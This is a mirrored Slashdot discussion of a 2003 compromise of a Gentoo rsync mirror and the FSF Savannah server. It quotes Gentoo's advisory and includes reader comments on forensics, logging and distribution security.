Slashdot Mirror
Gentoo rsync Server Compromised [updated]
costela writes "LWN points out that the Gentoo project
fired out an alert about one compromised rsync server." From the message itself: "However, the compromised system had both an IDS and a file integrity checker installed and we have a very detailed forensic trail of what happened once the box was breached, so we are reasonably confident that the portage tree stored on that box was unaffected." Update: 12/03 22:54 GMT by T : One more damage report: gibson writes "The Free Software Foundation recently discovered that its software host site was compromised a month ago. The compromise appears to be the same as the recent attacks on the Debian servers. The site is shut down until Friday while they install replacement hardware and verify the authenticity of the hosted source code."
The infrequency of linux/unix box break-ins is what makes this newsworthy. we all know that for every 1 linux/unix box that is compromised, there are a whole slew of windows machines.
"...if you don't like your job, you don't strike. You just go in every day and do it really half-assed..." -Homer
who didn't see this coming? I use gentoo and i figured it was a matter of time before someone did this. I mean haveing a central tree is cool but it does make it more of a target for attacks. I am however glad to see that they took precautions.
A conspiracy theorist could have a field day..
Now where did I put my tin-foil hat?
This is the sort of site that gets /.'d so here's the full text.
Just to summarize - they don't know how it was done but they're pretty certain no damage was done.
Text
On December 2nd at approximately 03:45 UTC, one of the servers that makes up the rsync.gentoo.org rotation was compromised via a remote exploit. At this point, we are still performing forensic analysis. However, the compromised system had both an IDS and a file integrity checker installed and we have a very detailed forensic trail of what happened once the box was breached, so we are reasonably confident that the portage tree stored on that box was unaffected. The attacker appears to have installed a rootkit and modified/deleted some files to cover their tracks, but left the server otherwise untouched.
The box was in a compromised state for approximately one hour before it was discovered and shut down. During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method used to gain access to the box remotely is still under investigation. We will release more details once we have ascertained the cause of the remote explo it.
This box is not an official Gentoo infrastructure box and is instead donated by a sponsor. The box provides other services not related to Gentoo Linux as well and the sponsor has requested that we not publicly identify the box at this time. Because the Gentoo part of this box appears to be unaffected by this exploit, we are currently honoring the sponsor's request. That said, = if at any point, we determine that any file in the portage tree was inappropriately modified, we will release full details about the compromised server.
Again, based on the forensic analysis done so far, we are reasonably confid= ent that no files within the Portage tree on the box were affected. However, t= he server has been removed from all rsync.*.gentoo.org rotations and will rema= in so until the forensic analysis has been completed and the box has been wiped and rebuilt. Thus, users preferring an extra level of security may ensure that they have a correct and accurate portage tree by running: emerge sync Which will perform a sync against another server, thus ensuring that all fil les are up to date.
Aide-toi, le Ciel t'aidera - Jeanne D'Arc.
they hadn't patched to 2.4.23 yet?
How come we never hear about breakins there or at this miserable failure of a website.
This seems to be a vuln in Rsync, not Gentoo. Hmm... Should be interesting to see what the audit turns up!
This was a local root hole. OpenBSD has had stacks of those.
IANAH (hacker), but isn't the first thing you do when you break into a system to 'fix' the logs?
How can they guarantee the tree hasn't been affected? Compare it with another copy?
What do all those Gentoo fanboys who were saying "this would never happen with Gentoo" when Debian had problems have to say now? What can you do about zealots?
And sorry to all the many, many, perfectly sensible Gentoo users out there. An unfortunate incident, but, as with the Debian incident, it looks as if it is being well handled. I'll be interested to see the details on how the compromise occurred.
Jedidiah
Craft Beer Programming T-shirts
Either hackers have decided they *hate* OSS (not likely) or someone is putting up a purse trying to damage the OSS communities security image.
Quack, quack.
Just one server of the many resync servers was compromised. It's not the end of the gentoo zealots, MUHAHAHA.Gentoo pwnz j00 :P
First Debian, now Gentoo.... Conspiracy! Either that or a horror movie.
Fortress of Insanity
I just threw away my tinfoil hat and made a new one out of steel. With a spike on top.
Once is happenstance, twice is coincidence, three times is some one playing silly buggers.
(Kernel.org, debian.org, gentoo.org - all in the same two months?)
Beep beep.
They haven't had a break in two weeks!
fuck you they have. It's all conspiracy from the Lunix boys. Theo de Raadt and his army of Real CodeX0r Men is teh shiznat.
Any bets on which major distro will be next? Better yet, instead of point spreads on professional sporting events - Vegas should be taking bets on which distro (or well established free software org) gets rooted next...
First Debian, now Gentoo... Slackware perhaps? Maybe install a spam-bot on a knoppix image?
Today, I decided that I wasn't entirely happy with Debian, and so I have Gentoo stage3 LiveCDs sitting on my desk, ready for an install when I get home...
Maybe someone should start working on Desktop OpenBSD. :-P
Stating on Slashdot that I like cheese since 1997.
... they DO have records of what was done and were able to isolate it pretty quickly. IMHO, that's probably saved them a lot of trouble.
Whether it's because the cracker was sloppy or inexperienced, or because the Gentoo team have good server security, I can't say - but it seems they were pretty lucky compared to Debian.
What baffles me is why crackers go after targets like this. I can understand anticapitalist stuff, but my intuition says someone trying to crack a *nix server and damage a distro must have detailed knowledge of *nix systems - and is therefore likely a user of an OpenSource operating system.
Is that guess a little too far off base? If so, what's your take?
"It is dark. You are likely to be eaten by a grue." -- Zork
who uses rsync on internet connected boxes?
doesn't that require rsh server?
I believe a head examination is in order... better to rsync internally, then scp the new/different files out to internet boxes.
break in to Debian, it was notices within 24 hours. Break into Gentoo, noticed in 1 hour. Break in to Microsoft, not noticed for MONTHS.
To those who aren't intentionally trying to troll.. and computer journalists;
Yes, Linux servers can be compramised.
No, the sky is not falling.
No, it's not the end of Linux or open source.
Luck favors the prepared, darling.
perhaps you've noticed just how few posts there are to this thread so far as of this date/time stamp, compared to the date/time stamp of the story?
ed
Now consider what would happen if the Windows update service was compromized and hackers managed to get past Microsoft's tight security. These update servers could be used for WMD's (Windows Massive Disruptions)...
From excellent karma to terible karma with a single +5 funny post...
First the kernel root, then Debian, then Gentoo.
Geesh...Microsoft black-ops is getting around alot this past month!
Leading to the hacking machine? Fixing the compromises on major linux servers is one thing, but why has nobody mentioned finding the perpetrators?
Anything in these logs on the source of the hacks? Probably another hacked machine, but perhaps it can be traced to a source.
Also, in any package that were compromised or attempted at, what is being inserted? Perhaps we can use it as a honeypot to catch a hacker?
Perhaps 2.4.23 should have a kernel allowance for a log that tells when somebody was trying to use the =2.4.22 exploit (or does it)?
Well, like in the article...it appears that only 20 people sync'ed with this box...and if you're worried...just do emerge sync again...and you will be directed to another, non-affected box and that should take care of any worries you might have.
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
I needed to upgrade my kernel and I'm guessing that by the now deathly slow speed of kernel.org, I wasn't the only one that remembered its time to get the latest stable. There should be a new name for this effect.
It's just inevitable that a high-profile Gentoo server got broken into. I use Gentoo for my desktop, but if I were in a business environment, I'd stick with Redhat or SuSe. Gentoo has always been an enthusiast's distribution. I personally hold Gentoo and Debian in as high regard as one another, and Gentoo is just my personal preference. Both have excellent package managers. Behaving a as a Zealot, whether for Debian, Gentoo, Slackware, or for a religion just makes you look like a blind fool.
Leads? I'll just check with the boys back at the crime lab. They got 3 more detectives working on the case. They got us working in shifts!
-The Big Lebowski
Seriously though, I would hope that organizations like Debian or Gentoo would have the brain power and tech resources to find a few leads that results in arrests. But why do I doubt that anyone will ever be arrested for any of these types of attacks?
Some of us don't subscribe to lists, or don't check our list mails often.
Get off my launchpad!
Security goes beyond patching servers.
Fortress of Insanity
IANAH (hacker), but isn't the first thing you do when you break into a system to 'fix' the logs?
Yes, but I think SOP would be to do a little Jedi handwaving "There was no breach". So if they have a good forensic trail, it's either a) real or b) fake. But why create a fake one, if they could have erased it properly? The only reason would be to hope that the box would be apparently fixed, but in reality still rooted. However, as the article said, after the investigation is done it'll be wiped and rebuilt, which is how it should be.
Kjella
Live today, because you never know what tomorrow brings
This just means Linux is hitting the big times... :-)
EvilCON - Made Famous by
so what was the remote exploit that was used?
Does the name Pavlov ring a bell?
Does anyone have an old, cached copy of the DNS record for rsync.gentoo.org?
.
Diff it against what's out there now and we're only a quick trip to http://arin.net/whois from knowing who it was . .
-Peter
ACs aren't credible. Don't believe a thing they say.
Go ahead, send them some mail. I'm sure they'll answer immediately.
Luck favors the prepared, darling.
"I told you before to stop playing and go to sleep!
You just wait until your father gets home!"
...and it is mine!
But seriously, the people attacking these Linux servers have shown a great deal of talent. I suspect they've become bored hacking their way into Windows systems. What better way to "raise the bar" and really display one's abilities than to hack the (mostly) unhackable? I think this is (sadly) an inevitable fact of life.
Someone seems to be trying to get a trojan in Linux, probably to give it a bad name. Maybe it would be a good idea to try to do the same to the possible perpretrator(s) before they succeed, so we can point to them when (not if, when) they manage to do it?
(Note: this is only an hypotetical question. I'm not saying anyone should do it except as a thought experiment.)
...it's Major League Baseball. Hey, look, it's Mark McGwire! Hit us some zingers, Mark! :)
That's true... you don't have to buy Linux.
In my book, peeps who make distros are as far from my computer knowledge as me from my mom. I simply can not understand how those websites can be hacked.
Did 'they' really get shell access ? Or did they manage to upload a file into the tree ? Is it not possible at all to secure a server ? Slashdot, being one of the most known websites in nerd-universe must be under attack practically all the time I suppose; How come they can secure the site while Gentoo can not ? Is it so difficult that it requires a fulltime job from someone ? I always thought that it was enough to apply the current patches.
All this leaves me with a very uncomfortable feeling. I have some websites running on linux servers (not mine) from rackspace providers. Should I be worried ?
When will I end this grieving ? When will my future begin ?
There is no sure thing in security but there is a simple step to make things a bit more reliable for logging.
If you really have a serious system where you want detailed logs you keep the logs for that system off that machine. Sure the machine that is logging could have been comprimized as well but that is twice as much work. Now you have to hack the machine but also the logger to erase the intrusion event.
In fact one of the things I've seen done is that events are logged on the machine and the logger. The idea was to provide not only redundant logging but also provide a front for hackers. A hacker would see the local logs and be too busy doctoring up those logs to check to see if there is an external logger.
In any event, the logging Gentoo did looks complete enough. They claim only 20 users did a sync against the server during the hour it was online and comprized.
PS, full props for the Lebowski quote!
Luck favors the prepared, darling.
I'm not sure, but I think that was the inference.
This would be fine assuming no software was emerged, if one of those 20 happened to 'emerge -u system' and there WAS packages amiss, that would be bad and not cleaned up by an emerge sync.
Would be a good thing to see if notifying those 20 people was possible.
Anything is possible given time and money.
luckily, i've been too lazy to 'emerge sync' lately...
Smokey the Bear says, "Strip mining prevents forest fires!"
You know, this is like TESB -- we're running high after finding and exploiting a vulnerability in the Death Star, we're partying, medals are being awarded, and R2's ok...
Then The Empire goes after the rebels. Hoth is fscked, Han is carbonite, and Luke's missing a hand.
After having a field day with all the Windows viruses/worms, we're getting highly publicized compromises to OSS. The conspiracy theorists are pointing to a possible Jabba-like "hacker bounty" to reel in OSS. Is it the SCO tractor beams? Is it Fett freezing distros in carbonite? Is it the press cutting up the limbs of the Open Source movement?
ESR, it may be time to don the jedi outfit again. The rebels need their leaders out for at least a morale boost.
If I can find a reference I'll post it.
Assuming that OS X is free with the purchade of an iWhatever, I agree as well.
The Tools Of Ignorance wanna be a tool?
right up to the word smart.
;-)
n0\/\/ i ph3@r j00.
Quack, quack.
...nsync gets compromised up the backdoor all the time. It was only a matter of time before rsync got a peice of the funky butt lovin'.
Why not?
You take the keys of the developers [or even a cvs key] and then sign all the emerge files. There are only like 2000 new ones a day so at about 50ms a signature [for a really slow box] that's only 100 seconds of time [two minutes not much].
That way if the end user downloads compromised emerge files they could detect them.
Damn... I'm like a genius.
Someday, I'll have a real sig.
In that no computer trusts any other computer, ever for any reason.
You're guarding an armored car. Another man approaches you wearing all the correct uniform and regalia, he evens looks familiar to you, you've seen his face at the armored car company. He has the password of the day.
Can you REALLY trust him? How do you know that he's really who he says he is? And even if Bob the guard really is Bob the guard, how do you know that Bob the guard hasn't just all of a sudden decided to slip a few $$ in his pocket when you aren't looking or just knock you out from behind and take off with a sack of money?
Traitors ALWAYS work from within.
Who do you trust?
Do you trust people you've never met with your computer security or do you take it upon yourself to handle your own security.
If one computer gets comprimised in a "trusted computing" system, the game is over. Don't trust anyone or anything.
Machines are easy to fool, they can't think.
The only SECURE computer is one that is melted down into an ingot of pot metal. THAT computer can't be comprimised.
Anyone want to recommend an easy to use IDS to put on a stand alone workstation? When I move again and I deploy a BSD router, snort will be going on that machine. Until then what would this group suggest I put on this stand alone workstation that will require the minimum amount of headaches to setup/use?
Thank you.
One of the servers that makes up the rsync.gentoo.org rotation was compromised. This box is not an official Gentoo infrastructure box and is instead donated by a sponsor. The box provides other services as well and the sponsor has requested that we not publicly identify the box at this time.
While it may run Gentoo, it is not stated as such, and could be very well be something else.
Get a free ipod.
To correct a few misconceptions in the previous comments.
It was not their server that was compromised, just a third party server in a round robin rotation. They don't own it, they don't maintain it - just someone else who donated server space.
The primary or master server is not accessible to users, it was not compromised, and so none of the original source files had a chance to be changed.
Only the 20 users that synchronized to this server even have a tiny chance of getting bad files. Having everyone sync now that this server is out of the rotation will immediately fix the problem.
Full disclosure 24 hours later. I give them a lot of credit for such a quick response and disclosure. This is very, very minor.
~J
NetCraft reports Linux and Apache (Red hat version). http://uptime.netcraft.com/up/graph?site=rsync.gen too.org
Fortress of Insanity
So I've been lurking around here long enough to spot certain trends. (Warning: generalizations ahead)
OSS advocates love to hate Windows
OSS advocates gloat when a new hole turns up in Windows
OSS advocates point to the number of worms, virus, etc in Windows and say, "Never us"
Then several OSS distros have a security breach in a short space of time.
OSS advocates respond with "Must be a conspiracy against us by some evil entity", "Hey, look how quick we caught it", "It would have been much worse with Windows".
Time to face facts gents. Windows is attacked FAR more than OSS. Why? Well, yes, it is full of holes. But downtown Philly is riddled with abandoned houses with no locks on the doors but they never get broken into. Why? No value in doing so. Not enough damage, headlines, misplaced glory, etc. But the main reason is that it is the dominant OS out there. I fear that we will see more and more attacks against OSS with it's growing popularity. If we all get our wish and 'nix takes over Windows dominant market position and is running on 90% of desktops, you will most likely find it a target for constant attacks like Windows has now.
We all know in order for 'nix to make it to the desktop, it has to become WAY more user friendly. Can't have Grandma trying to recompile the kernel now can we? User friendly unfortunately translates into users being able to do things that comprise security. Like opening attachments, downloading Trojans, etc. Then the great security built into the OS goes right out the window. no pun intended).
So before you all start crying about conspiracies, et al, just remember that we all may be victims of our own push to make the 'nix stuff more popular. By bragging about how secure it is, we just may be attracting the type of attack that is more sophisticated then the script kiddies attacking Windows. I imagine it's cool to brag to your friends that you broke into a Windows box. I imagine it's much cooler to brag that your rooted a Linux distro. Badge of honor and all that.
The opinions expressed here are not mine, but those of these dang voices in my head.
Moron moderators
Almost all slackware users (slackies?) I know do their upgrades by doing the 'configure;make;make install'-mamba baby!
(for the humor impaired: this was a joke -- albeit a lousy one from a slackie)
Okay... I'll do the stupid things first, then you shy people follow.
[Zappa]
Would be a prime target if you could take down www.openbsd.org - of course with one remote exploit in 7 years. But it would be a claim to fame
I have mod points and I am not afraid to use them
I wouldn't use GOATSE Linux if I were you. I hear it has a major security hole in the default install.
What's up with the moderators today?
Pool of idiots I tells ya
Guess you never've heard of a cutting torch? ;-)
that was stolen from SCO....
"Talk minus action equals nothing" - Joey Shithead, D.O.A.
"Talk minus action equals
How many people would bend the law in order to make real money? How many spammers are out there? Do you think that the only members of our population with questionable morals are in the bulk-mail industry? Think about it. If all you had to do was wire some kid in Croatia some capital, not actually hurt anybody? I'm not saying it would work, but there are bound to be some unscrupulous people in the tech industry somewhere, right?
Quack, quack.
MAN! if the terrorists are in on this, and since this is obviously a microsoft plot microsoft must be terrorists....... AH second hand information, "i know this guy who knows this guy who works at this company and this is what he said" :) by the way i know this is a troll but it's one of the funnier things I've seen today
Y0Ur 0n3 0f 7H3M!
Quack, quack.
rooted 1% faster than a binary install!
With apologies to Torne, from whom I stole this quote.
I am one of many. My idea is not unique, nor do I expect my voice alone to sway you. I speak in a chorus of opinion.
Make me almost want to say:
"where are all the Gentoo zealots now?"
but being a Gentoo user myself, I'll just keep my mouth shut.
Ahhhh, the irony...
... when somebody compromises Darwin.
To a Lisp hacker, XML is S-expressions in drag.
[15:49:30] hey all you -v users! quote me! quote me! i wanna be famous
[15:50:05] oh, btw, all you anonymous -v people, the server was running minix!
[15:50:06] ok, quote me: the box was running DOS. yes, DOS! dos 6.3 with a tcp stack stolen from os/2
"You tried your best and failed miserably. The lesson is...never try. Heh!" -Homer
Hey, they told me Uplink was just a game!
That's not what Matthew J. Szulik says.
cloudcity.com
Collectible Star War
IDS is placed on a system to follow an attack. Audit trails on sensitive machines reveal all commands executed, to the detail you desire.
Here is the point. Bruce Schneier says that the important part of security is not that you were compromised, but rather that you can react within a time frame to keep the damage to acceptable levels. If you can tolerate having your system compromised for weeks, don't invest in a lot of security. The short response time (2 hours at 11pmEST) here indicates that the Gentoo administrators care about responsiveness enough to check on it frequently.
When the CVS gateway to Bitkeeper on the Linux Kernel was compromised, the developers of Bitkeeper were able to show that they care enough about security that they invested in many checks and balances that caught the error immediately. Since then, Bitkeeper developers, interested in protecting their good reputation (which is VERY difficult to replace), are considering even more drastic measures.
As a bonus, some cracker spent a good few days or weeks writing this exploit. We get to keep it and deploy the solution with little hassle. And the compromised system, because good security practices are in place, was mitigated to minimize damage.
Read Schneier's book Secret and Lies to find out how security is really a process. Yes, I know it's a plug, but I just thought the book hit-home to the real point - "When, not if" you get compromised.
Several other posts here hint that the world will think less of Linux for this. False. True CIOs should see that Linux has the tools to completely identify and contain attacks. Every CIO knows attacks cannot be stopped, but rather they must be contained to acceptable levels.
And MacOS X comes bundled with the Mac.
Maybe we deserve this world ?
Good luck catching your buglar. I want to know how to patch my box.
"Learning is not compulsory... neither is survival."
--Dr.W.Edwards Deming
These are breakins into closely monitored machines.
The other (MS) breakins were essentailly equivalent to penetrating a firewall, not compromising a server.
Let's face it, no OS is 100% secure. Operating Systems that are more secure than others still need to be on their toes. One security exploitation on a Linux box can still be as dangerous as a thousand (an underestimated ratio I'm sure) exploitations on a Windows box. However, I will take the body of security knowledge surrounding an OS to be as valuable as the initial security design principles in the OS in the first place; with that in mind, many Open Source OS's come out looking pretty good. I trust the Linux community to grind down and fix security problems and not sit around and emphasize the numerous security in a Microsoft product. If you're concerned, then help out developers by testing the software and reporting bugs. You could even code a few patches yourself, that being the whole point of community-based development.
Whether or not there is a deep and dark plot to root big Linux boxes is irrelevant. This is another opportunity to demonstrate the Open Source community's response to security issues to the rest of the computing community. If the heat is really on and this is not just another artifact of news gatekeepers getting over-zealous on a trend, then so be it. It is an opportunity to review and evolve Linux's security as well as the security processes that surround it.
One of the things I admire most about Linus Torvalds is his steadfast commitment to the quality of his product. It is a commitment that is focused on constant improvement, not PR damage control. I'm sure the real security guru's are sitting with a bit more comfort knowing their servers are running Linux.
Disclaimer: This post contains no constructive content whatsoever, swallow two tablespoons of salt and call me in the morning.
The death of one is a tradegy, but the death of millions is a statistic
For all of you that are curious, this isn't a BSD troll (although it could be...).
My point here is that whenever a larger *NIX server is broken in to, there are ALWAYS people that comlain about "the insecurity of *NIX". Well, when ONE large *nix server is broken in to, it makes it to the front page of slashdot, whereas blaster/sobig/etc usually get a story or two.
This is where the quote above comes into play.
Linux might look insecure, but that's because we usually hear about breakins on a 1 server basis. When we here about Windows, it's usually in the HUNDREDS OF THOUSANDS (if not more). If there was a slashdot story for every one of THOSE servers, then it would appear the way it actually is.
Not Free(as in beer). Free(as in "I'm free to beat you over the head for being a dumbass")
Moderators on /. are RE-FUCKING-TARDS..
Now that was not a troll, that was *flamebait*..
Yes.. but think again.. rsync.gentoo.org runs a round robin type load sharing system so there could be a hundred servers under that domain. You just netcrafted one or the control host.
As far as I know, it was a Gentoo Linux box, but it is NOT maintained by the Gentoo team. It also hosts other services and thats why noone is saying what its name is or what else its used for...
It ran Longhorn, bought at Malaysia for $1.75
... did whoever did this steal any of our source code?
(George edits 95% of the /. copy.)
You'd think but www.openbsd.org doesn't run OpenBSD. Here's a link that explains why.
In fact, just last year ftp.openbsd.org did get compromised!
A radio maverick jumps to internet only. The Future of Rock n Roll
If you buy the idea that spammers are behind many of the recent worm/viruses, designed to turn machines into spam zombies, it's also probably reasonable to conclude that Windows isn't exactly a reliable platform to trojan; I'd bet a lot of trojans fail to infect properly simply due to Windows problems. And then there's the problem AV software, many of the machines being behind firewalls/NAT and being unreachable. And then there's people turning their PC's off when they don't use them.
OSS machines, however, are a much more reliable computing environment, meaning that any trojans are actually like to work, and work well. And I'd also wager that many OSS machines are used AS firewalls or bastion machines, and if compromised are easily accessable for spamming or use as stepping stones to other machines. And many of these machines are always on -- you don't have to worry about lack of reliability from disabled machines.
This makes more sense to me than any other conspiracy.
Not really!
You see, there is a difference between an rsync server and a distfile server. They are not the same, hence your scenario is not a problem.
If you mod me down, I *will* introduce you to my sister!
That's complete crap. Look how you're spinning this. A high-profile Gentoo Linux breach, and some Slashdotter STILL finds a way to bash Microsoft.
Okay.
*Ahem*
Microsoft did it.
The rsync server has the ebuilds, correct? There's not a lot of security in an ebuild, given that it's just a script, running as root.
:)
Granted, nothing probably happened. Reasonably, no one was affected. No big deal.
Unless one of the 20 was me.
Anything is possible given time and money.
Chances are, nobody's Portage tree was affected. The bigger question, however, is how Gentoo's security could be improved. As a start, the md5sum of the important parts of a client's portage tree could be compared with one from gentoo.org, which would of course be signed, after each emerge sync. I wouldn't be surprised if something like this already exists, though.
Litigious bastards
http://savannah.gnu.org/statement.html
On December 1st, 2003, we discovered that the "Savannah" system, which is maintained by the Free Software Foundation and provides CVS and development services to the GNU project and other Free Software projects, was compromised at circa November 2nd, 2003.
GNU
GNOME
Gentoo
The list goes on. According to this, Linux is the one breached more often.
Wow Debian and now Gentoo...Microsoft must be really busy now!(Sorry for that extreme sarcasm).
Creative Demolition
"IIRC the load balancing for Windows Update is carried out bu linux machines..."
I would be very surprised if this were the case. I'd peg them to use BSD long before they'd touch anything that clearly GPL, and I'd not even expect BSD unless they were continuing their standard, "Embrace, Extend, Expand" approach.
If they ever did actually use Linux for such a critical function and it leaked out, even if it were compromised, it would be like they came out directly to say that Linux is better for enterprise grade security than their own OS is. They couldn't risk that even if the machines went down daily.
Do not look into laser with remaining eye.
It sucks, because it makes fanatical zealots look like flaming hypocrites.
The rest of us rational folks knew all along Linux wasn't perfect, but heaven forbid we mention it to the Mandrake and Gentoo kiddies on Slashdot. I've been modded down just for having this sig, which is ridiculous.
Seeing Gentoo itself be attacked with a remote exploit--especially in light of the fact that Linux is the most breached as it is--is just not surprising to me at all. The reason is because no system is perfect, especially not OSS. And we've been reading about a lot of high-profile break-ins lately, which is just funny.
Yes, it makes a lot of people look stupid when this stuff happens, and I do enjoy it, because I'm always branded as a Microsoft shill just for pointing out obvious truths. And then the news speaks for itself.
"Sufferin' succotash."
Sure there have been security breaches, security breaches will always be with us. Anyone who can't accept that is probably a prime customer for Palladium, and deserves what they get.
The real issue here is that Debian and Gentoo were both forthcoming about the breaches. They both did the Right Thing. Not only that, but they've both collected forensics, and if not identifying culprits, are at least contributing to improving the security of the Linux community.
This is Real Security, as opposed to hiding the facts, and hoping nobody ever finds out.
The living have better things to do than to continue hating the dead.
http://www.winnetmag.com/windowspaulthurrott/Artic le/ArticleID/41035/windowspaulthurrott_41035.html
During an oddly-underpublicized security Webcast Monday, Microsoft revealed that hackers subject the company to 2500 to 3000 electronic attacks every day, or over 100,000 a month. Yet despite this massive number of attacks, the last successful intrusion occurred over three years ago, during the infamous October 2000 security breach. But the software giant says the biggest security risk to the company isn't external electronic attack of its Web properties, but rather its huge fleet of mobile workers and partners--some 60,000 strong--that access the company's 175 remote access points on a regular basis.
We've taken a deep look inside Microsoft to see how we can improve security at every level," sad Mike Nash, the vice president of the Security Business Unit at Microsoft, during the Webcast. "A lot of the technology we use Microsoft applies directly to [customers'] work."
Microsoft revealed some other interesting statistics during the Webcast. The company uses Computer Associates' eTrust security management suite to secure its networks. It uses two-factor authentication (user name/password and smart card) to better secure its intellectual property.
"Sufferin' succotash."
Yes, it has the ebuilds, but they need to be used by the emerge program or ebuild program. They can't be executed alone, i.e they are not shell scripts. They are basically instructions on how to configure the package, which tarballs to download from where and what pre and post requisuites. Those are all protected by md5 sums.
If you mod me down, I *will* introduce you to my sister!
You're thinking of when the first RPC vulnerability hit (which was patched two months before, by the way...to all those Debian-heads crying out how the kernel exploit was patched in September), and Microsoft used Akamai for a short while because the trojan was set to DDOS one of their URLs.
The "threat" passed and everyone forgot about it.
"Sufferin' succotash."
emerge rsync
emerge --update world
peace of mind !
Electronic Music Made Using Linux http://soundcloud.com/polyp
Why does everyone assume some one group is behind it?
Couldn't it be that, as with every other public website out there, random hackers try to break in for fun and vandalism?
Come on. I'm fully expecting someone to implicate Microsoft in some way, as they do in every OSS break-in article.
"Sufferin' succotash."
Wow, an admin who fesses up (within 24 hours of breach) when (s)he's been hacked. See, now that wasn't so bad was it? Now why can't other admins do this too? Or at least follow the donts of damage control.
My opinion: for the same reason that officers of the peace make only vague handwavey-type sounds when asked if they have leads on the suspect of a crime.
So why brag about leads on /.? They have nothing to gain and everything to lose.
You cannot apply a technological solution to a sociological problem. (Edwards' Law)
I love it.
I've pointed out before that Windows is way more widespread than Linux, and so is more attacked and vulnerable, but then zealots come on and say Apache is the most-used on the net and yet not the most breached. But to this, it's already the most-breached operating system.
Hoot and holler about the reasons all you want, but them's the facts.
We REALLY, REALLY need to stop with the "Linux is invincible, Windows sucks" attitude. It's flat-out not true, and it's severely holding the community image back in the minds of the rest of the rational computing world who just uses what they use to get the job done and don't treat operating systems like religious belief systems.
"Sufferin' succotash."
Comment removed based on user account deletion
A Netcraft search for rsync.gentoo.org shows more than one server. Two of them run Gentoo, two run Red Hat, one runs Debian, three run unknown Linux, and one runs FreeBSD (some of the servers are listed twice). There are more servers (14, if one is to believe 'host rsync.gentoo.org|wc -l'), but Netcraft is only interested in those with web-servers.
When I say, you're kidding, right?
Random hackers attack things. Stop trying to pin it on some one mysterious group. It makes you look so incredibly paranoid.
Yes, Linux servers are not perfect. Accept this, patch, fix, and move on. Microsoft did, and they haven't had a break-in since October of 2000. According to a recent article, they're attacked 2500 to 3000 times daily.
"Sufferin' succotash."
You could waste a bunch of paper or you could just write to a CD. You'll run out of paper way before you run out of space on the CD.
ayottesoftware.com
it DOES RUN GENTOO! That's what's making it worse.
For any Gentoo user running the latest and greatest (Accept ~X86), doing an emerge-sync and "Emerge -U world" is no small task. It requires a few Hail Mary's and a human sacrafice to have a working system afterward. Users running the stable builds shouldn't have a problem though. I have personally blown up my Gentoo installation seven times, and each time I learn more about the inner workings of linux. BBH
...all Gentoo users deserve information about how this box, running Gentoo, got cracked remotely.
I'm not argueing one side or the other, just mentioning this for the sake of completeness. The post makes no specific mention that the compromised machine was itself running Gentoo. It may have been, it just wasn't stated one way or the other. And there's the possibility that the rootkit was installed locally and taken advantage of remotely.
I suggest immediate full-disclosure of the whole incident.
Your feelings about how devs handle security issues are yours to raise, and potentially rightly so. But take another look at the posting. It states that the purpose of the box was not solely to act as an rsync server. It's a donated service by a sponser that also hosts other services on that same machine. After reading that post it's hard to even know for sure if it was rooted because it was a Gentoo rsync server or for some other unrelated reason:
The box provides other services not related to Gentoo Linux as well and the sponsor has requested that we not publicly identify the box at this time. Because the Gentoo part of this box appears to be unaffected by this exploit, we are currently honoring the sponsor's request. That said, if at any point, we determine that any file in the portage tree was inappropriately modified, we will release full details about the compromised server.
We don't like "security through obscurity"
I don't see any unneeded obscurity surrounding this. It sounds more like you're just unhappy with whatever happened in IRC today.
I'm against picketing, but I don't know how to show it.
First it was Debian, now it's gentoo.
I'm switching to my own home brewed OS
You vulnerable Linux people don't deserve my support
Asta la vista, I won't be back!
I always wondered if admins in big places abused the links they managed.
One person could sniff MAJOR data from
many diverse sources. This over time would result in some nice login/passwords.
What part of _downtown_ Philly has abandoned houses in it? These days, you gotta get at least a couple of miles from Center City to find an abandoned house.
Once is happenstance, twice is coincidnece, three times is enemy action.
heh, are you the daniel mettler fucktard who was spamming #gentoo? gotta say, i agreed with ciaranm on that one...
-- roger55
Preach it brother!
How am I trolling?
I've unchecked my karma bonus and everything because I know this is offtopic. I was just curious?
"Sufferin' succotash."
You misspelled "are."
The log machine can very easily be perfect. There are two simple variations to this, one of you want it to work even after the box is rooted, one if you don't. The first is an inline network logger. It acts like a piece of copper wire, but records all the data going through it. The second is a serial or similar mass storage device that the computerrights its logs to. The device cannot be accessed for reading or reseting except through an interface not available to the computer.
Cars are built out of steel, not glass. Glass is a very strong material. But hit it with a hammer and it shatters. Steel just gets dented.
Gentoo had "ductile" security. They were able to limit the damage because they had some kind of Tripwire/mtree-like program running on the inside. Given the speed of the response, my guess is that they had a response plan ready to go.
The lesson is that measures to limit the damage from a break are as vital as measures to prevent breaks in the first place. Fire prevention doesn't substitute for sprinkler systems, and intrusion prevention doesn't substitute for backups. You've got to have both.
only one user was kicked some obnoxious little twat h20 was flooding and generally annoying the hell out of me i say good for ciaranm
So did it get synched up?
Mod this up...
I'm half expecting Gartner group or Microsoft or some such other party to now step forward and say..."SEE! They have to have their code holding servers open to the net so that their distributed developer base can update and add to the source, the open source model is inherently flawed, as these break ins have proven! When all of your developers are working on an internal network like at Microsoft this could never happen!".
Not to sound all tinfoil hat or anything, but this could be another prong in the whole anti OSS FUD campaign.
I am NaN
Aww, poor baby. Got your little spamming ass kicked out of the IRC channel, eh? Dumb fuck.
It'll never happen, BSD's are to hard a target.
From the Gentoo Altert:
Gentoo realized that they got hacked after one day.
GNU Savannah realized that they got hacked after one month.
It's time to propagate the use of file integrity checkers! They can detect the effects of any new exploit and can't be circumvented (when properly used!).
AIDE
Tripwire
"Word is that all 17 Linux users were affected."
A group of people in the UK recently came to the conclusion that IDS is actually the problem rather than the solution first hoped for.
Microsoft Hiring Unix Admins
p ?fromPage=viewJobs&jobNumb
er=906950&page=1&msid1=-2049921163&msid2=-49202693 8&msid3=-2123347170&msid4=
2105645115
Posted back in December 2000
This is from Microsoft's jobs page. http://www.microsoft.com/jobs/search/jobDetail.as
old link
SYSTEMS ADMINISTRATOR [Job Code: N05rc-dc ]
